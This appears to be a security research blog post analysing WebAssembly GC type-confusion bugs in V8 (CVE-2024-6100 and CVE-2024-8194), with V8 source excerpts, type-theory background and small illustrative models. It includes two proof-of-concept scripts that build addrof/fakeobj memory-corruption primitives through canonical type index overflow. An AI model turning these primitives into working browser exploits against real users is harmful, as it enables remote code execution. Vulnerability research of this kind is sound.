xia0o0o0o

Overview of WebAssembly Type Confusion in JavaScript Engines Exploitation

January 2, 2025

Introduction

WebAssembly (Wasm) is a relatively low-level language and virtual machine, much closer to a real CPU than a higher-level language like JavaScript. Initially, Wasm supported only four basic numeric types:

Type    Description
i32     32-bit integer
i64     64-bit integer
f32     32-bit floating point
f64     64-bit floating point

However, with the WebAssembly Garbage Collection (WasmGC) extension, WebAssembly now supports more complex types.

In simplified terms, garbage collection is the attempt to reclaim memory that the program allocated but no longer references.

WasmGC now adds struct and array heap types, which means support for non-linear memory allocation. Each WasmGC object has a fixed type and structure, which makes it easy for VMs to generate efficient code to access their fields without the risk of deoptimizations that dynamic languages like JavaScript have.

Reference Types

(type $s1 (struct)) ;; index = 0

Given the type $s1, the type (ref null $s1) is a reference to a value of type $s1, or null.

Struct Types

(type $s2 (struct (field i32) (field i64))) ;; index = 1

Array Types

(type $a1 (array i32)) ;; index = 2

Recursive Types

A rec group lets Wasm define mutually recursive types; a single type can also refer to itself.

(rec
  (type $A (struct (field $b (ref null $B))))
  (type $B (struct (field $a (ref null $A))))
)
(type $C (struct (field $f i32) (field $c (ref null $C))))

External Types

External types can refer to types defined in host environments, for example, JavaScript.

Case Study

CVE-2024-2887

https://github.com/KpwnZ/browser-pwn-collection/tree/main/v8/CVE-2024-2887

CVE-2024-6100

Iso-recursive Types

The type constructor that solves a recursive type equation can be written as:

$$\mu \alpha. \tau$$

And

$$\mu \alpha. \tau \equiv [\mu \alpha. \tau/\alpha]\tau$$

We call the left-to-right substitution unfolding, and the right-to-left one folding. Values of an iso-recursive type must be introduced and eliminated using term-level operators. That is, we need type annotations when folding so that the type of the value is uniquely determined.
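
As a small worked example (an illustration, not taken from a specification), the self-referential struct $C from the Recursive Types section can be written as a μ-type. Unfolding substitutes the whole type for the bound variable exactly once:

```latex
\begin{aligned}
C &= \mu \alpha.\ \mathsf{struct}\ \{\, f : \mathsf{i32},\ c : \mathsf{ref\ null}\ \alpha \,\} \\
\mathrm{unfold}(C) &= [C/\alpha]\ \mathsf{struct}\ \{\, f : \mathsf{i32},\ c : \mathsf{ref\ null}\ \alpha \,\} \\
                   &= \mathsf{struct}\ \{\, f : \mathsf{i32},\ c : \mathsf{ref\ null}\ C \,\}
\end{aligned}
```

Folding goes the other way: it takes the last line back to C, and that step is where the annotation is needed.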

WasmGC supports comparing types across modules: types defined in different modules are compared through the recursive groups they belong to.

When V8 decodes the type section:
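
To make the idea concrete, here is a toy model of canonicalizing recursive groups. It is a sketch only and not V8's implementation: the class name, the JSON-based structural key, and the type encoding (references stored as indices relative to the start of the group) are all assumptions made for illustration, and references to types outside the group are left out.

```javascript
// Toy model of iso-recursive canonicalization; NOT V8's implementation.
// A type is { fields: [...] }, where each field is either a primitive name
// such as "i32" or { ref: k }, with k an index relative to the group start.
class ToyCanonicalizer {
  constructor() {
    this.groups = new Map(); // structural key -> first canonical index
    this.nextIndex = 0;
  }

  // Returns the canonical indices assigned to the types of one rec group.
  addRecGroup(types) {
    const key = JSON.stringify(types);
    if (!this.groups.has(key)) {
      this.groups.set(key, this.nextIndex);
      this.nextIndex += types.length;
    }
    const first = this.groups.get(key);
    return types.map((_, i) => first + i);
  }
}

// Two "modules" declare the same mutually recursive pair $A/$B.
const pair = [{ fields: [{ ref: 1 }] }, { fields: [{ ref: 0 }] }];
const canon = new ToyCanonicalizer();
const moduleA = canon.addRecGroup(pair);
const moduleB = canon.addRecGroup(JSON.parse(JSON.stringify(pair)));
const other = canon.addRecGroup([{ fields: ["i32"] }]);
console.log(moduleA, moduleB, other);
```

In this model the two structurally identical groups share canonical indices, while the unrelated group gets a fresh one. That is the property that lets types from different modules be compared by index.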

void DecodeTypeSection() {
  // ...
  for (uint32_t i = 0; ok() && i < types_count; ++i) {
    TRACE("DecodeType[%d] module+%d\n", i, static_cast<int>(pc_ - start_));
    uint8_t kind = read_u8<Decoder::FullValidationTag>(pc(), "type kind");
    size_t initial_size = module_->types.size();
    if (kind == kWasmRecursiveTypeGroupCode) {
      module_->is_wasm_gc = true;
      uint32_t rec_group_offset = pc_offset();
      consume_bytes(1, "rec. group definition", tracer_);
      if (tracer_) tracer_->NextLine();
      uint32_t group_size =
          consume_count("recursive group size", kV8MaxWasmTypes);
      if (tracer_) tracer_->RecGroupOffset(rec_group_offset, group_size);
      if (initial_size + group_size > kV8MaxWasmTypes) {
        errorf(pc(), "Type definition count exceeds maximum %zu",
               kV8MaxWasmTypes);
        return;
      }
      // We need to resize types before decoding the type definitions in this
      // group, so that the correct type size is visible to type definitions.
      module_->types.resize(initial_size + group_size);
      module_->isorecursive_canonical_type_ids.resize(initial_size +
                                                      group_size);
      for (uint32_t j = 0; j < group_size; j++) {
        if (tracer_) tracer_->TypeOffset(pc_offset());
        TypeDefinition type = consume_subtype_definition(initial_size + j);
        module_->types[initial_size + j] = type;
      }
      if (failed()) return;
      type_canon->AddRecursiveGroup(module_.get(), group_size);
    }
    // ...
  }
  // ...
}

In the AddRecursiveGroup method:

  uint32_t first_canonical_index =
      static_cast<uint32_t>(canonical_supertypes_.size());
  canonical_supertypes_.resize(first_canonical_index + size);
  // [!] take some time to consider what's wrong here
  for (uint32_t i = 0; i < size; i++) {
    CanonicalType& canonical_type = group.types[i];
    // Compute the canonical index of the supertype: If it is relative, we
    // need to add {first_canonical_index}.
    canonical_supertypes_[first_canonical_index + i] =
        canonical_type.is_relative_supertype
            ? canonical_type.type_def.supertype + first_canonical_index
            : canonical_type.type_def.supertype;
    module->isorecursive_canonical_type_ids[start_index + i] =
        first_canonical_index + i;
  }

This means that for a type i, the canonical type index is module->isorecursive_canonical_type_ids[i], and canonical_supertypes_ records the subtyping relationships. Recall from the writeup of CVE-2024-2887 that the type index is capped at kV8MaxWasmTypes = 1000000. But the code above performs no bounds check on the canonical indices held in canonical_supertypes_ and isorecursive_canonical_type_ids.
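
The arithmetic can be sketched with a toy counter. This is only bookkeeping, under two assumptions: every group is new (no deduplication), and two predefined canonical types exist, as the TypeCanonicalizer excerpt quoted in the proof of concept suggests. The function name and group sizes are illustrative.

```javascript
// Toy bookkeeping only: models how canonical indices are handed out, assuming
// every rec group is new (no deduplication) and two predefined types exist.
const kV8MaxWasmTypes = 1000000;
const kNumberOfPredefinedTypes = 2;

let canonicalCount = kNumberOfPredefinedTypes;

// Mirrors the resize in AddRecursiveGroup: each group takes `size` fresh slots
// and nothing stops the running total from passing kV8MaxWasmTypes.
function addRecursiveGroup(size) {
  const first = canonicalCount;
  canonicalCount += size;
  return first;
}

const firstModule = addRecursiveGroup(kV8MaxWasmTypes); // within the per-module cap
const secondModule = addRecursiveGroup(6);              // a small follow-up group
const fourthType = secondModule + 3;                    // fourth type of that group

console.log(firstModule, secondModule, fourthType);
console.log(fourthType - kV8MaxWasmTypes);
```

Each module stays within its own limit, yet the fourth type of the second group ends up five past kV8MaxWasmTypes in the global numbering.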

class ValueType {
 public:
  //...
  static constexpr int kLastUsedBit = 25;
  static constexpr int kKindBits = 5;
  static constexpr int kHeapTypeBits = 20;
  static const intptr_t kBitFieldOffset;
  // ...
}

Looking at the definition of ValueType, we only have 20 bits (kHeapTypeBits) for the heap type. That is enough for heap types, but not for canonical type indices, since nothing bounds them. This gives us some type confusion strategies:

  • If a type i has canonical type index (n << 20) + t, it will be confused with the type whose canonical type index is t.
  • We can create a type confusion between the internal reserved heap types and canonical type indices.
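
The first strategy can be illustrated with a small bit-field model. The layout is an assumption inferred from kKindBits = 5 and kHeapTypeBits = 20 (kind in the low bits, heap type directly above it). The helper names and the kind value are hypothetical.

```javascript
// Assumed layout, inferred from kKindBits = 5 and kHeapTypeBits = 20:
// bits 0..4 hold the kind, bits 5..24 hold the heap type / type index.
const kKindBits = 5;
const kHeapTypeBits = 20;
const kHeapTypeMask = (1 << kHeapTypeBits) - 1;

// Decoding keeps only the 20 bits of the heap type field.
function decodeHeapType(bitField) {
  return (bitField >>> kKindBits) & kHeapTypeMask;
}

// Encoding without a range check lets high index bits spill past the field.
function encodeUnchecked(kind, index) {
  return (kind | (index << kKindBits)) >>> 0;
}

const kind = 10; // hypothetical kind value
const t = 7;     // hypothetical small canonical index
const n = 1;     // any non-zero n is lost on decode
const big = n * (1 << kHeapTypeBits) + t;

console.log(decodeHeapType(encodeUnchecked(kind, big)));
console.log(decodeHeapType(encodeUnchecked(kind, t)));
```

Both calls decode to the same heap type value, so a consumer that reads only the field cannot tell the two indices apart.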

In JSToWasmObject()

namespace wasm {
MaybeHandle<Object> JSToWasmObject(Isolate* isolate, Handle<Object> value,
                                   CanonicalValueType expected,
                                   const char** error_message) {
  // ...
  switch (expected.heap_representation_non_shared()) {
    case HeapType::kExtern: 
    // ...
  }
  // ...
}
}

heap_representation_non_shared() in turn calls heap_representation(), which is defined as:

  constexpr HeapType::Representation heap_representation() const {
    DCHECK(is_object_reference());
    return static_cast<HeapType::Representation>(
        HeapTypeField::decode(bit_field_));
  }

The heap type conversion simply takes the heap type bit field as is. That means we can confuse a canonical type index with an internal reserved heap type.
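
A rough sketch of the second strategy follows. It assumes that the generic heap types (func, eq, any, extern and so on) are numbered from kV8MaxWasmTypes upward. Their exact order is not modeled, and classifyHeapField is a hypothetical helper, not a V8 function.

```javascript
// Assumption: generic heap types (func, eq, any, extern, ...) are numbered
// from kV8MaxWasmTypes upward; their exact order is not modeled here.
const kV8MaxWasmTypes = 1000000;

// Hypothetical helper: how a consumer that trusts the raw field would read it.
function classifyHeapField(fieldValue) {
  return fieldValue >= kV8MaxWasmTypes
    ? { generic: true, offset: fieldValue - kV8MaxWasmTypes }
    : { generic: false, typeIndex: fieldValue };
}

// The proof of concept annotates its struct as kV8MaxWasmTypes + 5.
const pwnStructCanonicalIndex = kV8MaxWasmTypes + 5;
console.log(classifyHeapField(pwnStructCanonicalIndex));
console.log(classifyHeapField(42));
```

Under that assumption, a user-defined struct whose canonical index lands past kV8MaxWasmTypes is read as one of the reserved generic heap types, so a switch such as the one in JSToWasmObject applies that generic type's checks instead of the struct's.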

Proof of Concept

Here is the proof of concept:

/*
class TypeCanonicalizer {
 public:
  static constexpr CanonicalTypeIndex kPredefinedArrayI8Index{0};
  static constexpr CanonicalTypeIndex kPredefinedArrayI16Index{1};
  static constexpr uint32_t kNumberOfPredefinedTypes = 2;
}
*/
 
d8.file.execute('../..//test/mjsunit/wasm/wasm-module-builder.js');
 
 
const kV8MaxWasmTypes = 1000000;
 
// recursive group
// add kV8MaxWasmTypes types
let builder = new WasmModuleBuilder();
builder.startRecGroup();
for (let i = 0; i < kV8MaxWasmTypes; i++) {
    builder.addStruct([makeField(kWasmI32, true)]);
}
builder.endRecGroup();
let wasm = builder.instantiate();
 
builder = new WasmModuleBuilder();
 
builder.startRecGroup();
builder.addStruct([makeField(kWasmI32, true)]);
builder.addStruct([makeField(kWasmI32, true)]);
builder.addStruct([makeField(kWasmI32, true)]);
// kV8MaxWasmTypes + 5
let pwn_struct = builder.addStruct([
    makeField(kWasmI32, true),
    makeField(kWasmI32, true),
    makeField(kWasmI32, true),
    makeField(kWasmI32, true),
    makeField(kWasmI32, true),
    makeField(kWasmI32, true),
    makeField(kWasmI32, true),
    makeField(kWasmI32, true),
]);
let get_object = builder.addType(makeSig([wasmRefType(pwn_struct)], [kWasmI32]));
let set_object = builder.addType(makeSig([wasmRefType(pwn_struct), kWasmI32], []));
 
// LEB encode 
// https://webassembly.github.io/spec/core/binary/values.html
builder.addFunction('set_object', set_object).addBody([
    kExprLocalGet, 0,
    kExprLocalGet, 1,
    kGCPrefix, kExprStructSet, ...wasmSignedLeb(pwn_struct), 6,
    // struct.set struct_index, struct, field_index, value
]).exportFunc();
 
builder.addFunction('get_object', get_object).addBody([
    kExprLocalGet, 0,
    kGCPrefix, kExprStructGet, ...wasmSignedLeb(pwn_struct), 6,
]).exportFunc();
builder.endRecGroup();
 
const instance = builder.instantiate();
 
let arr1 = [1.1, 1.2, 1.3, 1.4];
let arr2 = [{}, 1.1, 1.2, 1.3];
 
function addrof(obj) {
    arr2[0] = obj;
    return instance.exports.get_object(arr2);
}
 
function fakeobj(addr) {
    instance.exports.set_object(arr2, addr);
    return arr2[0];
}
 
function hex(num) {
    return num.toString(16);
}
 
let addrof_arr1 = addrof(arr1);
let __arr1 = fakeobj(addrof_arr1);
 
console.log(hex(addrof_arr1));
console.log(__arr1);
%DebugPrint(arr1);
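
The PoC encodes the struct type index with wasmSignedLeb from wasm-module-builder.js. As a self-contained sketch of what signed LEB128 encoding does (written for illustration, not copied from that helper, and limited to 32-bit integers because it relies on JavaScript's >> operator):

```javascript
// Signed LEB128 for 32-bit integers: emit 7 bits per byte, low bits first,
// and set the high bit on every byte except the last.
function signedLeb128(value) {
  const bytes = [];
  while (true) {
    const byte = value & 0x7f;
    value >>= 7; // arithmetic shift preserves the sign
    const signBit = byte & 0x40;
    const done = (value === 0 && !signBit) || (value === -1 && signBit);
    if (done) {
      bytes.push(byte);
      return bytes;
    }
    bytes.push(byte | 0x80);
  }
}

console.log(signedLeb128(3));
console.log(signedLeb128(64));
console.log(signedLeb128(-123456));
```

Small non-negative indices below 64 encode to a single byte, which is why many hand-written bodies get away with writing the index directly.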

CVE-2024-8194

Google fixed CVE-2024-6100 by adding the following patch:

void TypeCanonicalizer::CheckMaxCanonicalIndex() const {
  if (canonical_supertypes_.size() > kMaxCanonicalTypes) {
    V8::FatalProcessOutOfMemory(nullptr, "too many canonicalized types");
  }
}

This checks the number of canonical types whenever a recursive group is added. However:

static constexpr size_t kMaxCanonicalTypes = kSmiMaxValue;

kMaxCanonicalTypes is too big to fit in 20 bits. Thus we can still overflow the canonical type index to create a type confusion.
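
A quick size comparison, assuming kSmiMaxValue is 2^30 - 1 on builds with 31-bit Smis and 2^31 - 1 on builds with 32-bit Smis (the variable names are illustrative):

```javascript
// Assumption: kSmiMaxValue is 2^30 - 1 with 31-bit Smis (pointer compression)
// and 2^31 - 1 with 32-bit Smis; either way it dwarfs the 20-bit field.
const kHeapTypeBits = 20;
const maxEncodableIndex = 2 ** kHeapTypeBits - 1;
const smiMax31 = 2 ** 30 - 1;
const smiMax32 = 2 ** 31 - 1;

console.log(maxEncodableIndex.toString(16));
console.log(smiMax31 > maxEncodableIndex, smiMax32 > maxEncodableIndex);
console.log(Math.log2(smiMax31 + 1) - kHeapTypeBits); // spare bits above the field
```

Even the smaller limit leaves ten bits of headroom above what the heap type field can hold, so the check never fires before the index overflows the field.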

When V8 adds a new recursive group:

  for (uint32_t i = 0; i < size; i++) {
    group.types[i] = CanonicalizeTypeDef(module, module->types[start_index + i],
                                         start_index);
  }

CanonicalizeTypeDef converts the type indices inside a type definition into canonical type indices.

    case TypeDefinition::kStruct: {
      const StructType* original_type = type.struct_type;
      StructType::Builder builder(&zone_, original_type->field_count());
      for (uint32_t i = 0; i < original_type->field_count(); i++) {
        builder.AddField(CanonicalizeValueType(module, original_type->field(i),
                                               recursive_group_start),
                         original_type->mutability(i),
                         original_type->field_offset(i));
      }
      builder.set_total_fields_size(original_type->total_fields_size());
      result = TypeDefinition(
          builder.Build(StructType::Builder::kUseProvidedOffsets),
          canonical_supertype, type.is_final, type.is_shared);
      break;
    }

In CanonicalizeValueType and CanonicalWithRelativeIndex:

ValueType TypeCanonicalizer::CanonicalizeValueType(
    const WasmModule* module, ValueType type,
    uint32_t recursive_group_start) const {
  if (!type.has_index()) return type;
  return type.ref_index() >= recursive_group_start
             ? ValueType::CanonicalWithRelativeIndex(
                   type.kind(), type.ref_index() - recursive_group_start)
             : ValueType::FromIndex(
                   type.kind(),
                   module->isorecursive_canonical_type_ids[type.ref_index()]);
}
 
  static constexpr ValueType CanonicalWithRelativeIndex(ValueKind kind,
                                                        uint32_t index) {
    return ValueType(KindField::encode(kind) | HeapTypeField::encode(index) |
                     CanonicalRelativeField::encode(true));
  }

When type.ref_index() >= recursive_group_start, the reference is canonicalized with an index relative to the start of the group.
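
The branch can be mirrored in a few lines. This is a simplified model rather than V8 code. The object shape returned here and the sample values are assumptions for illustration.

```javascript
// Simplified mirror of the branch in CanonicalizeValueType (not V8 code).
function canonicalizeRef(refIndex, recursiveGroupStart, canonicalIds) {
  return refIndex >= recursiveGroupStart
    ? { relative: true, index: refIndex - recursiveGroupStart }
    : { relative: false, index: canonicalIds[refIndex] };
}

// Hypothetical module: type 0 was canonicalized earlier, types 1..2 form the
// rec group currently being processed.
const canonicalIds = [1234];
const groupStart = 1;
console.log(canonicalizeRef(2, groupStart, canonicalIds));
console.log(canonicalizeRef(0, groupStart, canonicalIds));
```

A reference to module type 2 from a group starting at 1 becomes relative index 1, while a reference to an earlier type is looked up in the table of already assigned canonical indices.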

We can control this relative index by

builder.addStruct([makeField(wasmRefType(n), true)]);

when n >= recursive_group_start. This lets us craft a type confusion between the types with index 0x100000 | n and n, where 0x100000 = 1 << 20 is the first bit beyond the 20-bit heap type field.
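
One plausible way to picture the collision is sketched below. The layout is assumed from kKindBits = 5, kHeapTypeBits = 20 and kLastUsedBit = 25: kind in bits 0..4, heap type in bits 5..24, and the relative flag in bit 25. It is also assumed that encoding shifts the index without masking. The function names echo the V8 ones but the bodies are a model, not the real code.

```javascript
// Assumed layout: kind in bits 0..4, heap type in bits 5..24, "canonical
// relative" flag in bit 25. Encoding is modeled as shift-without-mask.
const kKindBits = 5;
const kHeapTypeBits = 20;
const kRelativeFlag = 2 ** (kKindBits + kHeapTypeBits); // bit 25

// Absolute canonical index, no range check on `index`.
function fromIndex(kind, index) {
  return kind + index * 2 ** kKindBits;
}

// Relative index inside the current rec group, with the flag bit set.
function canonicalWithRelativeIndex(kind, relativeIndex) {
  return kind + relativeIndex * 2 ** kKindBits + kRelativeFlag;
}

const kind = 9; // hypothetical kind value below 2^5
const absolute = fromIndex(kind, 0x100001);
const relative = canonicalWithRelativeIndex(kind, 1);
console.log(absolute.toString(16), relative.toString(16), absolute === relative);
```

Under these assumptions, bit 20 of an oversized absolute index lands exactly on the flag bit, so absolute index 0x100001 and relative index 1 produce the same bit pattern.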

Proof of Concept

d8.file.execute('../..//test/mjsunit/wasm/wasm-module-builder.js');
 
const kV8MaxWasmTypes = 1000000;
 
// we can't fit all 0x100001 types in one recursive group
{
    console.log("[*] create 1000000 types");
    let builder = new WasmModuleBuilder();
    builder.startRecGroup();
    for (let i = 0; i < kV8MaxWasmTypes - 3; i++) {
        builder.addStruct([makeField(kWasmI32, true)]);
    }
    builder.endRecGroup();
    builder.instantiate();
}
{
    console.log("[*] create 0x100001 types");
    let builder = new WasmModuleBuilder();
    builder.startRecGroup();
    for (let i = 0; i < 0x100001 - 1000000; i++) {
        builder.addStruct([makeField(kWasmI32, true)]);
    }
    builder.endRecGroup();
    builder.instantiate();
}
 
let builder = new WasmModuleBuilder();
let canonicalized_100001 = builder.addStruct([makeField(kWasmI32, true)]);   // canonical index 0x100001, index 0 in rec group
 
// group
builder.startRecGroup();
let ref2index2 = builder.addStruct([makeField(wasmRefType(2), true)]);       // heaptype index = 2 - 1 = 1, { field0(ref{externref}): 1(0x100001) }
let index2 = builder.addStruct([makeField(kWasmExternRef, true)]);           // index 2 in rec group
builder.endRecGroup();
 
// group
builder.startRecGroup();
let ref2canonicalized = builder.addStruct([makeField(wasmRefType(canonicalized_100001), true)]);   // heaptype 0x100001, { field0: rec0_type0x100001 }
let ext = builder.addStruct([makeField(kWasmExternRef, true)]);
builder.endRecGroup();
 
let fakeobj_type = builder.addType(makeSig([kWasmI32], [kWasmExternRef]));
 
builder.addFunction('fakeobj', fakeobj_type).addBody([
    kExprLocalGet, 0,                                       // get arg0
    kGCPrefix, kExprStructNew, canonicalized_100001,        // create struct with type 0x100001, { field0(int32): arg0 }
    kGCPrefix, kExprStructNew, ref2canonicalized,           // create struct with type 0 in group1, { field0(ref): { field0(int32): arg0 } }
    kGCPrefix, kExprStructGet, ref2index2, 0,               // type confusion, get { field0(int32): arg0 } as { field0(ref{externref}): arg0 }
    kGCPrefix, kExprStructGet, ext, 0,                      // get arg0 as externref
]).exportFunc();
 
let instance = builder.instantiate();
let fakeobj = instance.exports.fakeobj;
console.log(fakeobj(0xc0ffee | 1));
 
 

References

  • Seunghyun Lee (@0x10n): WebAssembly Is All You Need: Exploiting Chrome and the V8 Sandbox 10+ times with WASM
  • Yaoda Zhou, Bruno C. d. S. Oliveira, Jinxu Zhao: Revisiting Iso-Recursive Subtyping
  • Andreas Rossberg: Mutually Iso-recursive Subtyping (Expanded)